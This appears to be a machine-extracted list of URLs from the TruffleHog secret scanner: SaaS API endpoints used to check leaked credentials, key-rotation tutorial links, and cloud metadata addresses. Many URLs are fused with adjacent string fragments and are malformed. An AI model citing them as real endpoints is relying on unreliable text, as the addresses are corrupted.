[https://nethunt.com/api/v1/zapier/triggers/readable](https://nethunt.com/api/v1/zapier/triggers/readable)
[https://owlbot.info/api/v4/dictionary/securityhttps](https://owlbot.info/api/v4/dictionary/securityhttps)
[https://transit.walkscore.com/transit/search/stops/](https://transit.walkscore.com/transit/search/stops/)
[https://uptime.betterstack.com/api/v2/monitorshttps](https://uptime.betterstack.com/api/v2/monitorshttps)
[https://www.googleapis.com/blogger/v3/blogs/2399953](https://www.googleapis.com/blogger/v3/blogs/2399953)
[https://amplitude.com/api/2/taxonomy/categoryhttps](https://amplitude.com/api/2/taxonomy/categoryhttps)
[https://api.appfollow.io/api/v2/account/usershttps](https://api.appfollow.io/api/v2/account/usershttps)
[https://api.developer.coinbase.com/waas/poolsquery](https://api.developer.coinbase.com/waas/poolsquery)
[https://api.edenai.run/v1/automl/text/projecthttps](https://api.edenai.run/v1/automl/text/projecthttps)
[https://api.loginradius.com/identity/v2/serverinfo](https://api.loginradius.com/identity/v2/serverinfo)
[https://api.shutterstock.com/v2/images/searchhttps](https://api.shutterstock.com/v2/images/searchhttps)
[https://api.stripe.com/v1/quotes/nowaythiscanexist](https://api.stripe.com/v1/quotes/nowaythiscanexist)
[https://api.stripe.com/v1/test_helpers/test_clocks](https://api.stripe.com/v1/test_helpers/test_clocks)
[https://api.stripe.com/v1/tokens/nowaycanthisexist](https://api.stripe.com/v1/tokens/nowaycanthisexist)
[https://app.revampcrm.com/api/1.0/User/WhoAmIhttps](https://app.revampcrm.com/api/1.0/User/WhoAmIhttps)
[https://disqus.com/api/3.0/trends/listThreads.json](https://disqus.com/api/3.0/trends/listThreads.json)
[https://docs.stripe.com/api/checkout/sessions/list](https://docs.stripe.com/api/checkout/sessions/list)
[https://docs.stripe.com/api/issuing/cards/retrieve](https://docs.stripe.com/api/issuing/cards/retrieve)
[https://docs.stripe.com/api/payment_intents/create](https://docs.stripe.com/api/payment_intents/create)
[https://docs.stripe.com/api/promotion_codes/create](https://docs.stripe.com/api/promotion_codes/create)
[https://docs.stripe.com/api/webhook_endpoints/list](https://docs.stripe.com/api/webhook_endpoints/list)
[https://financialmodelingprep.com/api/v3/financial](https://financialmodelingprep.com/api/v3/financial)
[https://gate.sendbird.com/api/v2/applicationshttps](https://gate.sendbird.com/api/v2/applicationshttps)
[https://github.com/trufflesecurity/test_keyscannot](https://github.com/trufflesecurity/test_keyscannot)
[https://howtorotate.com/docs/tutorials/aws/request](https://howtorotate.com/docs/tutorials/aws/request)
[https://howtorotate.com/docs/tutorials/azure/https](https://howtorotate.com/docs/tutorials/azure/https)
[https://howtorotate.com/docs/tutorials/mongo/https](https://howtorotate.com/docs/tutorials/mongo/https)
[https://ws.detectlanguage.com/0.2/user/statushttps](https://ws.detectlanguage.com/0.2/user/statushttps)
[https://www.pivotaltracker.com/services/v5/mehttps](https://www.pivotaltracker.com/services/v5/mehttps)
[http://dictionaryperceptionrevolutionfoundationpx](http://dictionaryperceptionrevolutionfoundationpx)
[https://api.cloudflare.com/client/v4/certificates](https://api.cloudflare.com/client/v4/certificates)
[https://api.fulcrumapp.com/api/v2/forms.jsonhttps](https://api.fulcrumapp.com/api/v2/forms.jsonhttps)
[https://api.pandadoc.com/public/v1/documentshttps](https://api.pandadoc.com/public/v1/documentshttps)
[https://api.planetscale.com/v1/organizationshttps](https://api.planetscale.com/v1/organizationshttps)
[https://api.stripe.com/v1/billing_portal/sessions](https://api.stripe.com/v1/billing_portal/sessions)
[https://api.upcdatabase.org/product/0111222333446](https://api.upcdatabase.org/product/0111222333446)
[https://api.weatherbit.io/v2.0/history/airquality](https://api.weatherbit.io/v2.0/history/airquality)
[https://cloud.iexapis.com/stable/stock/aapl/quote](https://cloud.iexapis.com/stable/stock/aapl/quote)
[https://docs.stripe.com/api/application_fees/list](https://docs.stripe.com/api/application_fees/list)
[https://docs.stripe.com/api/issuing/tokens/update](https://docs.stripe.com/api/issuing/tokens/update)
[https://docs.stripe.com/api/radar/reviews/approve](https://docs.stripe.com/api/radar/reviews/approve)
[https://docs.stripe.com/api/shipping_rates/create](https://docs.stripe.com/api/shipping_rates/create)
[https://docs.stripe.com/api/tax/settings/retrieve](https://docs.stripe.com/api/tax/settings/retrieve)
[https://docs.stripe.com/api/terminal/readers/list](https://docs.stripe.com/api/terminal/readers/list)
[https://docsapi.helpscout.net/v1/collectionshttps](https://docsapi.helpscout.net/v1/collectionshttps)
[https://howtorotate.com/docs/tutorials/groq/https](https://howtorotate.com/docs/tutorials/groq/https)
[https://io.adafruit.com/api/v2/ladybugtest/feeds/](https://io.adafruit.com/api/v2/ladybugtest/feeds/)
[https://salescookie.com/app/Api/CreateTransaction](https://salescookie.com/app/Api/CreateTransaction)
[https://slack.com/api/auth.testCreateCustomerCard](https://slack.com/api/auth.testCreateCustomerCard)
[https://vault.azure.cn/vault.microsoftazure.denot](https://vault.azure.cn/vault.microsoftazure.denot)
[https://www.bugherd.com/api_v2/projects.jsonhttps](https://www.bugherd.com/api_v2/projects.jsonhttps)
[https://yourwebsite.com/callbacks_handler/BuddyNS](https://yourwebsite.com/callbacks_handler/BuddyNS)
[https://api.appointedd.com/v1/availability/slots](https://api.appointedd.com/v1/availability/slots)
[https://api.openai.com/v1/fine_tuning/jobsfailed](https://api.openai.com/v1/fine_tuning/jobsfailed)
[https://api.paymongo.com/v1/payment_methodshttps](https://api.paymongo.com/v1/payment_methodshttps)
[https://api.postbacks.io/v1/requestPostbackhttps](https://api.postbacks.io/v1/requestPostbackhttps)
[https://api.route4me.com/api.v4/address_book.php](https://api.route4me.com/api.v4/address_book.php)
[https://api.sandbox.checkout.com/customers/https](https://api.sandbox.checkout.com/customers/https)
[https://api.stripe.com/v1/payment_method_domains](https://api.stripe.com/v1/payment_method_domains)
[https://api.worksnaps.com/api/projects.xmlunable](https://api.worksnaps.com/api/projects.xmlunable)
[https://docs.stripe.com/api/billing/meter/create](https://docs.stripe.com/api/billing/meter/create)
[https://docs.stripe.com/api/climate/order/create](https://docs.stripe.com/api/climate/order/create)
[https://docs.stripe.com/api/issuing/cards/create](https://docs.stripe.com/api/issuing/cards/create)
[https://docs.stripe.com/api/payment_intents/list](https://docs.stripe.com/api/payment_intents/list)
[https://docs.stripe.com/api/promotion_codes/list](https://docs.stripe.com/api/promotion_codes/list)
[https://docs.stripe.com/api/setup_intents/create](https://docs.stripe.com/api/setup_intents/create)
[https://docs.stripe.com/api/subscriptions/create](https://docs.stripe.com/api/subscriptions/create)
[https://docs.stripe.com/api/usage_records/create](https://docs.stripe.com/api/usage_records/create)
[https://howtorotate.com/docs/tutorials/gcp/https](https://howtorotate.com/docs/tutorials/gcp/https)
[https://oauth2.googleapis.com/tokenoauth2/google](https://oauth2.googleapis.com/tokenoauth2/google)
[https://person.clearbit.com/v1/people/email/alex](https://person.clearbit.com/v1/people/email/alex)
[https://www.ipqualityscore.com/api/json/account/](https://www.ipqualityscore.com/api/json/account/)
[https://www.mindmeister.com/services/rest/oauth2](https://www.mindmeister.com/services/rest/oauth2)
[https://www.worldcoinindex.com/apiservice/ticker](https://www.worldcoinindex.com/apiservice/ticker)
[http://169.254.170.2RequestLimitExceededinvalid](http://169.254.170.2RequestLimitExceededinvalid)
[https://api.enablex.io/voice/v1/call/api/access](https://api.enablex.io/voice/v1/call/api/access)
[https://api.flutterwave.com/v3/subaccountshttps](https://api.flutterwave.com/v3/subaccountshttps)
[https://api.getpostman.com/collections/0/ch1/0/](https://api.getpostman.com/collections/0/ch1/0/)
[https://api.openweathermap.org/data/2.5/weather](https://api.openweathermap.org/data/2.5/weather)
[https://api.peopledatalabs.com/v5/person/enrich](https://api.peopledatalabs.com/v5/person/enrich)
[https://api.pepipost.com/v5.1/domain/getDomains](https://api.pepipost.com/v5.1/domain/getDomains)
[https://api.signupgenius.com/v2/k/user/profile/](https://api.signupgenius.com/v2/k/user/profile/)
[https://api.stripe.com/v1/reporting/report_runs](https://api.stripe.com/v1/reporting/report_runs)
[https://api.surveyanyplace.com/v1/surveys/https](https://api.surveyanyplace.com/v1/surveys/https)
[https://api.unify.id/v1/humandetect/verifyhttps](https://api.unify.id/v1/humandetect/verifyhttps)
[https://app.onepagecrm.com/api/v3/contacts.json](https://app.onepagecrm.com/api/v3/contacts.json)
[https://docs.stripe.com/api/credit_notes/update](https://docs.stripe.com/api/credit_notes/update)
[https://docs.stripe.com/api/shipping_rates/list](https://docs.stripe.com/api/shipping_rates/list)
[https://learning.postman.com/docs/collaborating](https://learning.postman.com/docs/collaborating)
[https://management.core.usgovcloudapi.net/https](https://management.core.usgovcloudapi.net/https)
[https://mandrillapp.com/api/1.0/users/infohttps](https://mandrillapp.com/api/1.0/users/infohttps)
[https://otx.alienvault.com/api/v1/users/mehttps](https://otx.alienvault.com/api/v1/users/mehttps)
[https://run.salesblink.io/api/public/listshttps](https://run.salesblink.io/api/public/listshttps)
[https://storage.UNIVERSE_DOMAIN/storage/v1/gccl](https://storage.UNIVERSE_DOMAIN/storage/v1/gccl)
[https://unify.apideck.com/vault/consumerscouldn](https://unify.apideck.com/vault/consumerscouldn)
[https://www.mongodb.com/supportability/cosmosdb](https://www.mongodb.com/supportability/cosmosdb)
[https://www.virustotal.com/api/v3/metadatahttps](https://www.virustotal.com/api/v3/metadatahttps)
[https://accounts.google.com/o/oauth2/authhttps](https://accounts.google.com/o/oauth2/authhttps)
[https://api.bitbucket.org/2.0/repositoriesMake](https://api.bitbucket.org/2.0/repositoriesMake)
[https://api.cloudflare.com/client/v4/userhttps](https://api.cloudflare.com/client/v4/userhttps)
[https://api.detectify.com/rest/v2/assets/https](https://api.detectify.com/rest/v2/assets/https)
[https://api.github.com/user/social_accountssql](https://api.github.com/user/social_accountssql)
[https://api.helpcrunch.com/v1/departmentshttps](https://api.helpcrunch.com/v1/departmentshttps)
[https://api.lokalise.com/api2/system/languages](https://api.lokalise.com/api2/system/languages)
[https://api.pinata.cloud/pinning/pinJSONToIPFS](https://api.pinata.cloud/pinning/pinJSONToIPFS)
[https://api.postmarkapp.com/deliverystatshttps](https://api.postmarkapp.com/deliverystatshttps)
[https://api.sherpadesk.com/organizations/https](https://api.sherpadesk.com/organizations/https)
[https://api.stripe.com/v1/billing/meter_events](https://api.stripe.com/v1/billing/meter_events)
[https://api.surveysparrow.com/v1/contactshttps](https://api.surveysparrow.com/v1/contactshttps)
[https://api.travelpayouts.com/v2/prices/latest](https://api.travelpayouts.com/v2/prices/latest)
[https://api.tyntec.com/2fa/v1/applicationerror](https://api.tyntec.com/2fa/v1/applicationerror)
[https://dev.azuresynapse.usgovcloudapi.netdata](https://dev.azuresynapse.usgovcloudapi.netdata)
[https://docs.stripe.com/api/billing/meter/list](https://docs.stripe.com/api/billing/meter/list)
[https://docs.stripe.com/api/climate/order/list](https://docs.stripe.com/api/climate/order/list)
[https://docs.stripe.com/api/fee_refunds/create](https://docs.stripe.com/api/fee_refunds/create)
[https://docs.stripe.com/api/radar/reviews/list](https://docs.stripe.com/api/radar/reviews/list)
[https://docs.stripe.com/api/setup_intents/list](https://docs.stripe.com/api/setup_intents/list)
[https://docs.stripe.com/api/subscriptions/list](https://docs.stripe.com/api/subscriptions/list)
[https://docs.stripe.com/api/test_clocks/create](https://docs.stripe.com/api/test_clocks/create)
[https://docs.stripe.com/api/tokens/create_card](https://docs.stripe.com/api/tokens/create_card)
[https://github.com/golang/protobuf/issues/1609](https://github.com/golang/protobuf/issues/1609)
[https://howtorotate.com/docs/tutorials/twilio/](https://howtorotate.com/docs/tutorials/twilio/)
[https://interseller.io/api/campaigns/listhttps](https://interseller.io/api/campaigns/listhttps)
[https://management.core.chinacloudapi.cn/https](https://management.core.chinacloudapi.cn/https)
[https://mrticktock.com/app/api/is_timer_active](https://mrticktock.com/app/api/is_timer_active)
[https://oauth2.googleapis.com/device/codemssql](https://oauth2.googleapis.com/device/codemssql)
[https://partner_settingscategories.statsGoogle](https://partner_settingscategories.statsGoogle)
[https://pkg.go.dev/cloud.google.com/go/storage](https://pkg.go.dev/cloud.google.com/go/storage)
[https://soccer.sportmonks.com/api/v2.0/leagues](https://soccer.sportmonks.com/api/v2.0/leagues)
[https://stripo.email/emailgeneration/v1/emails](https://stripo.email/emailgeneration/v1/emails)
[https://www.googleapis.com/oauth2/v3/tokeninfo](https://www.googleapis.com/oauth2/v3/tokeninfo)
[https://www.mapquestapi.com/datamanager/v2/get](https://www.mapquestapi.com/datamanager/v2/get)
[https://api.assemblyai.com/v2/transcripthttps](https://api.assemblyai.com/v2/transcripthttps)
[https://api.browshot.com/api/v1/instance/list](https://api.browshot.com/api/v1/instance/list)
[https://api.cashboardapp.com/account.xmlhttps](https://api.cashboardapp.com/account.xmlhttps)
[https://api.cloudconvert.com/v2/users/mehttps](https://api.cloudconvert.com/v2/users/mehttps)
[https://api.contentful.com/organizationshttps](https://api.contentful.com/organizationshttps)
[https://api.foursquare.com/v2/venues/trending](https://api.foursquare.com/v2/venues/trending)
[https://api.leadfeeder.com/accountsunexpected](https://api.leadfeeder.com/accountsunexpected)
[https://api.nicereply.com/v1/users/statshttps](https://api.nicereply.com/v1/users/statshttps)
[https://api.oopspam.com/v1/spamdetectionhttps](https://api.oopspam.com/v1/spamdetectionhttps)
[https://api.openai.com/v1/organizationsfailed](https://api.openai.com/v1/organizationsfailed)
[https://api.pdfshift.io/v3/credits/usagehttps](https://api.pdfshift.io/v3/credits/usagehttps)
[https://api.replicate.com/v1/predictionshttps](https://api.replicate.com/v1/predictionshttps)
[https://api.scaleway.com/instance/v1/zones/fr](https://api.scaleway.com/instance/v1/zones/fr)
[https://api.stripe.com/v1/account/login_links](https://api.stripe.com/v1/account/login_links)
[https://api.todoist.com/rest/v2/projectshttps](https://api.todoist.com/rest/v2/projectshttps)
[https://api.transferwise.com/v2/profileshttps](https://api.transferwise.com/v2/profileshttps)
[https://api.twelvedata.com/earliest_timestamp](https://api.twelvedata.com/earliest_timestamp)
[https://api.zerotier.com/api/v1/networkBranch](https://api.zerotier.com/api/v1/networkBranch)
[https://app.besnappy.com/api/v1/accountshttps](https://app.besnappy.com/api/v1/accountshttps)
[https://app.karmacrm.com/api/v3/contacts.json](https://app.karmacrm.com/api/v3/contacts.json)
[https://app.timecamp.com/third_party/api/user](https://app.timecamp.com/third_party/api/user)
[https://cloud.digitalocean.com/v1/oauth/token](https://cloud.digitalocean.com/v1/oauth/token)
[https://cloud.iexapis.com/v1/stock/aapl/quote](https://cloud.iexapis.com/v1/stock/aapl/quote)
[https://connect.squareup.com/oauth2/authorize](https://connect.squareup.com/oauth2/authorize)
[https://docs.stripe.com/api/credit_notes/list](https://docs.stripe.com/api/credit_notes/list)
[https://github.com/trufflesecurity/trufflehog](https://github.com/trufflesecurity/trufflehog)
[https://google.com&width=1920&height=1080xoxb](https://google.com&width=1920&height=1080xoxb)
[https://howtorotate.com/docs/tutorials/slack/](https://howtorotate.com/docs/tutorials/slack/)
[https://iamcredentials.UNIVERSE_DOMAIN/failed](https://iamcredentials.UNIVERSE_DOMAIN/failed)
[https://iamcredentials.googleapis.com/openpgp](https://iamcredentials.googleapis.com/openpgp)
[https://management.microsoftazure.de/expected](https://management.microsoftazure.de/expected)
[https://opentelemetry.io/schemas/1.17.0grpclb](https://opentelemetry.io/schemas/1.17.0grpclb)
[https://restpack.io/api/screenshot/usagehttps](https://restpack.io/api/screenshot/usagehttps)
[https://trufflesecurity.com/canariesGetGeoAPI](https://trufflesecurity.com/canariesGetGeoAPI)
[http://169.254.169.254/latest/api/tokennonce](http://169.254.169.254/latest/api/tokennonce)
[http://www.collada.org/2005/11/COLLADASchema](http://www.collada.org/2005/11/COLLADASchema)
[https://api.atlassian.com/admin/v1/orgshttps](https://api.atlassian.com/admin/v1/orgshttps)
[https://api.capsulecrm.com/api/v2/usershttps](https://api.capsulecrm.com/api/v2/usershttps)
[https://api.cloudsmith.io/v1/user/self/https](https://api.cloudsmith.io/v1/user/self/https)
[https://api.conversiontools.io/v1/taskshttps](https://api.conversiontools.io/v1/taskshttps)
[https://api.crowdin.com/api/v2/storageshttps](https://api.crowdin.com/api/v2/storageshttps)
[https://api.digitalocean.com/v2/accounthttps](https://api.digitalocean.com/v2/accounthttps)
[https://api.enigma.com/businesses/matchhttps](https://api.enigma.com/businesses/matchhttps)
[https://api.fmfw.io/api/3/spot/balancegithub](https://api.fmfw.io/api/3/spot/balancegithub)
[https://api.fullstory.com/operations/v1https](https://api.fullstory.com/operations/v1https)
[https://api.getresponse.com/v3/accountshttps](https://api.getresponse.com/v3/accountshttps)
[https://api.holistic.dev/api/v1/projecthttps](https://api.holistic.dev/api/v1/projecthttps)
[https://api.instamojo.com/oauth2/token/https](https://api.instamojo.com/oauth2/token/https)
[https://api.loyverse.com/v1.0/merchant/https](https://api.loyverse.com/v1.0/merchant/https)
[https://api.mailjet.com/v3/REST/messagehttps](https://api.mailjet.com/v3/REST/messagehttps)
[https://api.openai.com/v1/images/generations](https://api.openai.com/v1/images/generations)
[https://api.opencagedata.com/geocode/v1/json](https://api.opencagedata.com/geocode/v1/json)
[https://api.ramp.com/developer/v1/tokenhttps](https://api.ramp.com/developer/v1/tokenhttps)
[https://api.stripe.com/v1/terminal/locations](https://api.stripe.com/v1/terminal/locations)
[https://api.wistia.com/v1/stats/account.json](https://api.wistia.com/v1/stats/account.json)
[https://apis.paralleldots.com/v4/intenterror](https://apis.paralleldots.com/v4/intenterror)
[https://app.ayrshare.com/api/analytics/links](https://app.ayrshare.com/api/analytics/links)
[https://app.zenscrape.com/api/v1/statushttps](https://app.zenscrape.com/api/v1/statushttps)
[https://base.zenkit.com/api/v1/users/mehttps](https://base.zenkit.com/api/v1/users/mehttps)
[https://dashboard.chatfuel.com/api/botshttps](https://dashboard.chatfuel.com/api/botshttps)
[https://docs.stripe.com/api/customers/update](https://docs.stripe.com/api/customers/update)
[https://docs.stripe.com/api/sources/retrieve](https://docs.stripe.com/api/sources/retrieve)
[https://docs.stripe.com/api/tax_rates/create](https://docs.stripe.com/api/tax_rates/create)
[https://docs.stripe.com/api/test_clocks/list](https://docs.stripe.com/api/test_clocks/list)
[https://docs.stripe.com/api/transfers/create](https://docs.stripe.com/api/transfers/create)
[https://onfleet.com/api/v2/organizationhttps](https://onfleet.com/api/v2/organizationhttps)
[https://search.censys.io/api/v1/accounthttps](https://search.censys.io/api/v1/accounthttps)
[https://sslmate.com/api/v2/certs/example.com](https://sslmate.com/api/v2/certs/example.com)
[https://storage.googleapis.com/storage/v1/b/](https://storage.googleapis.com/storage/v1/b/)
[https://v3.api.hypertrack.com/trips/expected](https://v3.api.hypertrack.com/trips/expected)
[https://www.diggernaut.com/api/projectshttps](https://www.diggernaut.com/api/projectshttps)
[https://www.streak.com/api/v1/pipelineshttps](https://www.streak.com/api/v1/pipelineshttps)
[https://www.versioneye.com/api/v1/scanshttps](https://www.versioneye.com/api/v1/scanshttps)
[https://api.aeroworkflow.com/api/unexpected](https://api.aeroworkflow.com/api/unexpected)
[https://api.apiscience.com/v1/monitorshttps](https://api.apiscience.com/v1/monitorshttps)
[https://api.artsy.net/api/tokens/xapp_token](https://api.artsy.net/api/tokens/xapp_token)
[https://api.baremetrics.com/v1/accounthttps](https://api.baremetrics.com/v1/accounthttps)
[https://api.iconfinder.com/v4/iconsetslogin](https://api.iconfinder.com/v4/iconsetslogin)
[https://api.lexigram.io/v1/lexigraph/search](https://api.lexigram.io/v1/lexigraph/search)
[https://api.mailerlite.com/api/v2/campaigns](https://api.mailerlite.com/api/v2/campaigns)
[https://api.na1.insightly.com/v3.1/Contacts](https://api.na1.insightly.com/v3.1/Contacts)
[https://api.polygon.io/v2/reference/locales](https://api.polygon.io/v2/reference/locales)
[https://api.prefect.cloud/auth/loginInclude](https://api.prefect.cloud/auth/loginInclude)
[https://api.pulumi.com/api/user/stackshttps](https://api.pulumi.com/api/user/stackshttps)
[https://api.pushbullet.com/v2/users/mehttps](https://api.pushbullet.com/v2/users/mehttps)
[https://api.qualaroo.com/api/v1/nudgeshttps](https://api.qualaroo.com/api/v1/nudgeshttps)
[https://api.screenshotlayer.com/api/capture](https://api.screenshotlayer.com/api/capture)
[https://api.securitytrails.com/v1/pinghttps](https://api.securitytrails.com/v1/pinghttps)
[https://api.storyblok.com/v1/cdn/spaces/me/](https://api.storyblok.com/v1/cdn/spaces/me/)
[https://api.stripe.com/v1/apple_pay/domains](https://api.stripe.com/v1/apple_pay/domains)
[https://api.stripe.com/v1/checkout/sessions](https://api.stripe.com/v1/checkout/sessions)
[https://api.stripe.com/v1/customer_sessions](https://api.stripe.com/v1/customer_sessions)
[https://api.stripe.com/v1/webhook_endpoints](https://api.stripe.com/v1/webhook_endpoints)
[https://api.tickettailor.com/v1/ordershttps](https://api.tickettailor.com/v1/ordershttps)
[https://api.websitepulse.com/textserver.php](https://api.websitepulse.com/textserver.php)
[https://api.zipbooks.com/v2/auth/loginTotal](https://api.zipbooks.com/v2/auth/loginTotal)
[https://auth.freshbooks.com/oauth/authorize](https://auth.freshbooks.com/oauth/authorize)
[https://docs.stripe.com/api/disputes/update](https://docs.stripe.com/api/disputes/update)
[https://docs.stripe.com/api/invoices/create](https://docs.stripe.com/api/invoices/create)
[https://docs.stripe.com/api/products/create](https://docs.stripe.com/api/products/create)
[https://docs.stripe.com/api/tokens/retrieve](https://docs.stripe.com/api/tokens/retrieve)
[https://finnhub.io/api/v1/calendar/economic](https://finnhub.io/api/v1/calendar/economic)
[https://github.com/login/oauth/authorizekey](https://github.com/login/oauth/authorizekey)
[https://howtorotate.com/docs/tutorials/npm/](https://howtorotate.com/docs/tutorials/npm/)
[https://login.microsoftonline.com/semaphore](https://login.microsoftonline.com/semaphore)
[https://rest.textmagic.com/api/v2/userhttps](https://rest.textmagic.com/api/v2/userhttps)
[https://restpack.io/api/html2pdf/usagehttps](https://restpack.io/api/html2pdf/usagehttps)
[https://us.qubole.com/api/v1.2/accounthttps](https://us.qubole.com/api/v1.2/accounthttps)
[https://www.dnscheck.co/api/v1/groups/https](https://www.dnscheck.co/api/v1/groups/https)
[https://api.anthropic.com/v1/messageshttps](https://api.anthropic.com/v1/messageshttps)
[https://api.app.shortcut.com/api/v3/member](https://api.app.shortcut.com/api/v3/member)
[https://api.bugsnag.com/user/organizations](https://api.bugsnag.com/user/organizations)
[https://api.calorieninjas.com/v1/nutrition](https://api.calorieninjas.com/v1/nutrition)
[https://api.cloudimage.com/invalidatehttps](https://api.cloudimage.com/invalidatehttps)
[https://api.currentsapi.services/v1/latest](https://api.currentsapi.services/v1/latest)
[https://api.geoapify.com/v1/geocode/search](https://api.geoapify.com/v1/geocode/search)
[https://api.getgeoapi.com/v2/currency/list](https://api.getgeoapi.com/v2/currency/list)
[https://api.monkeylearn.com/v3/classifiers](https://api.monkeylearn.com/v3/classifiers)
[https://api.pipedream.com/v1/users/mehttps](https://api.pipedream.com/v1/users/mehttps)
[https://api.shotstack.io/stage/renderhttps](https://api.shotstack.io/stage/renderhttps)
[https://api.shutterstock.com/v2/userhelper](https://api.shutterstock.com/v2/userhelper)
[https://api.sigopt.com/v1/experimentshttps](https://api.sigopt.com/v1/experimentshttps)
[https://api.smartsheet.com/2.0/sheetshttps](https://api.smartsheet.com/2.0/sheetshttps)
[https://api.spoonacular.com/recipes/random](https://api.spoonacular.com/recipes/random)
[https://api.stitchdata.com/v4/sourceshttps](https://api.stitchdata.com/v4/sourceshttps)
[https://api.stormglass.io/v2/weather/point](https://api.stormglass.io/v2/weather/point)
[https://api.stripe.com/v1/terminal/readers](https://api.stripe.com/v1/terminal/readers)
[https://api.tradier.com/v1/watchlistshttps](https://api.tradier.com/v1/watchlistshttps)
[https://api.uptimerobot.com/v2/getMonitors](https://api.uptimerobot.com/v2/getMonitors)
[https://api.us2.sumologic.com/api/v1/users](https://api.us2.sumologic.com/api/v1/users)
[https://api.vercel.com/www/userenumerating](https://api.vercel.com/www/userenumerating)
[https://api.voicegain.ai/v1/sa/confighttps](https://api.voicegain.ai/v1/sa/confighttps)
[https://api.web3.storage/user/uploadshttps](https://api.web3.storage/user/uploadshttps)
[https://app.apacta.com/api/v1/time_entries](https://app.apacta.com/api/v1/time_entries)
[https://app.asana.com/api/1.0/users/meRead](https://app.asana.com/api/1.0/users/meRead)
[https://app.launchdarkly.com/api/v2/caller](https://app.launchdarkly.com/api/v2/caller)
[https://batch.core.usgovcloudapi.net/https](https://batch.core.usgovcloudapi.net/https)
[https://database.chinacloudapi.cn/expected](https://database.chinacloudapi.cn/expected)
[https://docs.stripe.com/api/charges/update](https://docs.stripe.com/api/charges/update)
[https://docs.stripe.com/api/coupons/create](https://docs.stripe.com/api/coupons/create)
[https://docs.stripe.com/api/customers/list](https://docs.stripe.com/api/customers/list)
[https://docs.stripe.com/api/payouts/create](https://docs.stripe.com/api/payouts/create)
[https://docs.stripe.com/api/sources/update](https://docs.stripe.com/api/sources/update)
[https://docs.stripe.com/api/tax_ids/create](https://docs.stripe.com/api/tax_ids/create)
[https://docs.stripe.com/api/tax_rates/list](https://docs.stripe.com/api/tax_rates/list)
[https://docs.stripe.com/api/transfers/list](https://docs.stripe.com/api/transfers/list)
[https://management.usgovcloudapi.net/https](https://management.usgovcloudapi.net/https)
[https://rest.clicksend.com/v3/accounthttps](https://rest.clicksend.com/v3/accounthttps)
[https://rest.messagebird.com/messageshttps](https://rest.messagebird.com/messageshttps)
[https://rubygems.org/api/v1/gems.jsonerror](https://rubygems.org/api/v1/gems.jsonerror)
[https://servicebus.usgovcloudapi.net/https](https://servicebus.usgovcloudapi.net/https)
[https://trufflesecurity.com/contacted25519](https://trufflesecurity.com/contacted25519)
[https://webexapis.com/v1/access_tokenhttps](https://webexapis.com/v1/access_tokenhttps)
[https://www.clinchpad.com/api/v1/pipelines](https://www.clinchpad.com/api/v1/pipelines)
[https://www.eventbriteapi.com/v3/users/me/](https://www.eventbriteapi.com/v3/users/me/)
[https://www.formbucket.com/v1/profilehttps](https://www.formbucket.com/v1/profilehttps)
[https://api.agora.io/dev/v1/projectshttps](https://api.agora.io/dev/v1/projectshttps)
[https://api.clarifai.com/v2/users/mehttps](https://api.clarifai.com/v2/users/mehttps)
[https://api.dareboost.com/0.8/confighttps](https://api.dareboost.com/0.8/confighttps)
[https://api.exchangeratesapi.io/v1/latest](https://api.exchangeratesapi.io/v1/latest)
[https://api.hellosign.com/v3/accounthttps](https://api.hellosign.com/v3/accounthttps)
[https://api.html2pdf.app/v1/generatehttps](https://api.html2pdf.app/v1/generatehttps)
[https://api.lemonsqueezy.com/v1/products/](https://api.lemonsqueezy.com/v1/products/)
[https://api.mailmodo.com/api/v1/campaigns](https://api.mailmodo.com/api/v1/campaigns)
[https://api.netlify.com/api/v1/siteshttps](https://api.netlify.com/api/v1/siteshttps)
[https://api.nftport.xyz/me/contractshttps](https://api.nftport.xyz/me/contractshttps)
[https://api.rebrandly.com/v1/accounthttps](https://api.rebrandly.com/v1/accounthttps)
[https://api.request.finance/invoiceshttps](https://api.request.finance/invoiceshttps)
[https://api.ritekit.com/v1/stats/multiple](https://api.ritekit.com/v1/stats/multiple)
[https://api.skrapp.io/api/v2/accounthttps](https://api.skrapp.io/api/v2/accounthttps)
[https://api.stripe.com/v1/payment_intents](https://api.stripe.com/v1/payment_intents)
[https://api.stripe.com/v1/promotion_codes](https://api.stripe.com/v1/promotion_codes)
[https://api.supabase.com/v1/projectshttps](https://api.supabase.com/v1/projectshttps)
[https://api.taxjar.com/v2/categorieshttps](https://api.taxjar.com/v2/categorieshttps)
[https://api.us1.signalfx.com/v2/dashboard](https://api.us1.signalfx.com/v2/dashboard)
[https://api.webscraper.io/api/v1/sitemaps](https://api.webscraper.io/api/v1/sitemaps)
[https://api.yelp.com/v3/businesses/search](https://api.yelp.com/v3/businesses/search)
[https://app.eraser.io/api/render/elements](https://app.eraser.io/api/render/elements)
[https://app.nimble.com/api/v1/myselfhttps](https://app.nimble.com/api/v1/myselfhttps)
[https://app.zipcodebase.com/api/v1/search](https://app.zipcodebase.com/api/v1/search)
[https://docs.stripe.com/api/account_links](https://docs.stripe.com/api/account_links)
[https://docs.stripe.com/api/disputes/list](https://docs.stripe.com/api/disputes/list)
[https://docs.stripe.com/api/invoices/list](https://docs.stripe.com/api/invoices/list)
[https://docs.stripe.com/api/prices/create](https://docs.stripe.com/api/prices/create)
[https://docs.stripe.com/api/products/list](https://docs.stripe.com/api/products/list)
[https://docs.stripe.com/api/quotes/update](https://docs.stripe.com/api/quotes/update)
[https://docs.stripe.com/api/topups/create](https://docs.stripe.com/api/topups/create)
[https://dynalist.io/api/v1/file/listhttps](https://dynalist.io/api/v1/file/listhttps)
[https://extractorapi.com/api/v1/extractor](https://extractorapi.com/api/v1/extractor)
[https://go.urbanairship.com/api/schedules](https://go.urbanairship.com/api/schedules)
[https://hooman.pipedrive.com/api/v1/users](https://hooman.pipedrive.com/api/v1/users)
[https://iamcredentials.googleapis.com/v1/](https://iamcredentials.googleapis.com/v1/)
[https://management.chinacloudapi.cn/https](https://management.chinacloudapi.cn/https)
[https://management.core.windows.net/https](https://management.core.windows.net/https)
[https://microsoftgraph.chinacloudapi.cngo](https://microsoftgraph.chinacloudapi.cngo)
[https://oss.trufflehog.org/updatesillegal](https://oss.trufflehog.org/updatesillegal)
[https://packagecloud.io/api/v1/reposhttps](https://packagecloud.io/api/v1/reposhttps)
[https://powrbot.com/api/v1/search/single/](https://powrbot.com/api/v1/search/single/)
[https://rest.coinapi.io/v1/exchangeshttps](https://rest.coinapi.io/v1/exchangeshttps)
[https://sandbox.impala.travel/v1/bookings](https://sandbox.impala.travel/v1/bookings)
[https://servicebus.chinacloudapi.cn/https](https://servicebus.chinacloudapi.cn/https)
[https://shot.screenshotapi.net/screenshot](https://shot.screenshotapi.net/screenshot)
